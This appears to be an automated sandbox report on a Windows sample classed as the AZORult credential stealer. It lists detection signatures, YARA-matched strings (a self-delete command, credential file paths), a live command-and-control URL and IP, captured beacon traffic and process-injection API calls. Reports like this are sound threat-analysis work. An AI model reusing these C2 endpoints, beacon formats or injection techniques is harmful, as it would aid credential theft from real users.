Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UoktqWamLR.exe

Overview

General Information

Sample name:UoktqWamLR.exe
renamed because original name is a hash value
Original sample name:97CC0E7D7CAA3483E4C5E5CFF9FBE67E.exe
Analysis ID:1504708
MD5:97cc0e7d7caa3483e4c5e5cff9fbe67e
SHA1:e74e03ad3d8f52ce5858a5e8208343fa04a2b367
SHA256:65e1b5713b271302e96bab80440f744c13c953749562603ea3ee03eda880f9ea
Tags:AZORultexe
Infos:

Detection

AZORult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected AZORult Info Stealer
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UoktqWamLR.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\UoktqWamLR.exe" MD5: 97CC0E7D7CAA3483E4C5E5CFF9FBE67E)
    • UoktqWamLR.exe (PID: 6164 cmdline: "C:\Users\user\Desktop\UoktqWamLR.exe" MD5: 97CC0E7D7CAA3483E4C5E5CFF9FBE67E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
{"C2 url": "https://ehzwq.shop/erd/mac/index.php"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
      • 0x19fd0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
      • 0xe164:$a2: %APPDATA%\.purple\accounts.xml
      • 0xe8ac:$a3: %TEMP%\curbuf.dat
      • 0x199b0:$a4: PasswordsList.txt
      • 0x14d28:$a5: Software\Valve\Steam
      00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
      • 0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
      • 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
      00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        Click to see the 25 entries
        SourceRuleDescriptionAuthorStrings
        0.2.UoktqWamLR.exe.4a70000.1.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          0.2.UoktqWamLR.exe.4a70000.1.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            0.2.UoktqWamLR.exe.4a70000.1.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
            • 0x193d0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
            • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
            • 0xdcac:$a3: %TEMP%\curbuf.dat
            • 0x18db0:$a4: PasswordsList.txt
            • 0x14128:$a5: Software\Valve\Steam
            0.2.UoktqWamLR.exe.4a70000.1.unpackAzorult_1Azorult Payloadkevoreilly
            • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
            • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
            2.2.UoktqWamLR.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              Click to see the 11 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T10:21:53.608256+020020168581A Network Trojan was detected192.168.2.54970745.77.249.79443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T10:22:13.752816+020020294651Malware Command and Control Activity Detected192.168.2.54970445.77.249.79443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T10:22:13.752816+020028102761Malware Command and Control Activity Detected192.168.2.54970445.77.249.79443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-05T10:22:12.936290+020028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.549704TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://ehzwq.shop/erd/mac/index.phpaAvira URL Cloud: Label: malware
              Source: https://ehzwq.shop/Avira URL Cloud: Label: malware
              Source: https://ehzwq.shop/erd/mac/index.phpAvira URL Cloud: Label: malware
              Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "https://ehzwq.shop/erd/mac/index.php"}
              Source: UoktqWamLR.exeReversingLabs: Detection: 63%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: UoktqWamLR.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040A610 CryptUnprotectData,LocalFree,2_2_0040A610
              Source: UoktqWamLR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00413030 FindFirstFileW,FindNextFileW,FindClose,2_2_00413030
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0041160C FindFirstFileW,FindNextFileW,FindClose,2_2_0041160C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00413F58
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,2_2_004119A8
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004119AC FindFirstFileW,FindNextFileW,FindClose,2_2_004119AC
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,2_2_00412D6C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00413F58

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.5:49707 -> 45.77.249.79:443
              Source: Network trafficSuricata IDS: 2029465 - Severity 1 - ET MALWARE Win32/AZORult V3.2 Client Checkin M15 : 192.168.2.5:49704 -> 45.77.249.79:443
              Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.5:49704 -> 45.77.249.79:443
              Source: Malware configuration extractorURLs: https://ehzwq.shop/erd/mac/index.php
              Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: POST /erd/mac/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ehzwq.shopContent-Length: 101Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /erd/mac/index.php HTTP/1.0Host: ehzwq.shopConnection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 101Data Raw: 4a 4c ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 39 2f ef bf bd 39 4f ef bf bd 3f 4e ef bf bd 3e 3c ef bf bd 3e 33 ef bf bd 3e 3e ef bf bd 3e 3b ef bf bd 3e 3e ef bf bd 3e 33 ef bf bd 3e 3a ef bf bd 3e 3d ef bf bd 3f 4e ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4b 2f ef bf bd 3d 4c ef bf bd 3f 4e ef bf bd 4b 4b ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 3a 2f ef bf bd 49 2f ef bf bd 3f 4f ef bf bd 3e 33 ef bf bd 3e 38 ef bf bd 28 39 ef bf bd 49 2f ef bf bd 39 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NKK(9(9L/:/I/?O>3>8(9I/9K
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: ehzwq.shop
              Source: unknownHTTP traffic detected: POST /erd/mac/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ehzwq.shopContent-Length: 101Cache-Control: no-cache
              Source: UoktqWamLR.exe, 00000000.00000003.2146906626.0000000000752000.00000004.00000020.00020000.00000000.sdmp, UoktqWamLR.exe, 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/j
              Source: UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
              Source: UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehzwq.shop/
              Source: UoktqWamLR.exe, 00000002.00000003.2190958012.00000000023D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ehzwq.shop/erd/mac/index.php
              Source: UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehzwq.shop/erd/mac/index.phpa
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49704 version: TLS 1.2

              System Summary

              barindex
              Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A7213 NtAllocateVirtualMemory,NtProtectVirtualMemory,ChrCmpIA,NtProtectVirtualMemory,0_2_004A7213
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A73E0 NtQueryInformationProcess,0_2_004A73E0
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02353113 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,0_2_02353113
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023530DA NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,0_2_023530DA
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_007510000_2_00751000
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: String function: 00403BF4 appears 46 times
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: String function: 004062FC appears 42 times
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: String function: 00404E98 appears 86 times
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: String function: 0040300C appears 32 times
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: String function: 00404EC0 appears 33 times
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: String function: 004034E4 appears 33 times
              Source: UoktqWamLR.exe, 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameacvm7qw909e.exe vs UoktqWamLR.exe
              Source: UoktqWamLR.exe, 00000002.00000000.2138058227.0000000000508000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameacvm7qw909e.exe vs UoktqWamLR.exe
              Source: UoktqWamLR.exeBinary or memory string: OriginalFilenameacvm7qw909e.exe vs UoktqWamLR.exe
              Source: UoktqWamLR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: UoktqWamLR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@2/1
              Source: C:\Users\user\Desktop\UoktqWamLR.exeMutant created: NULL
              Source: C:\Users\user\Desktop\UoktqWamLR.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E-69414907-A7566F0F-BFAE66A7-2E92F6D4A
              Source: UoktqWamLR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\UoktqWamLR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: UoktqWamLR.exeReversingLabs: Detection: 63%
              Source: unknownProcess created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"Jump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: msvbvm60.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: vb6zz.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: vb6de.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: vb6de.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: crtdll.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: kernel.appcore.dllJump to behavior
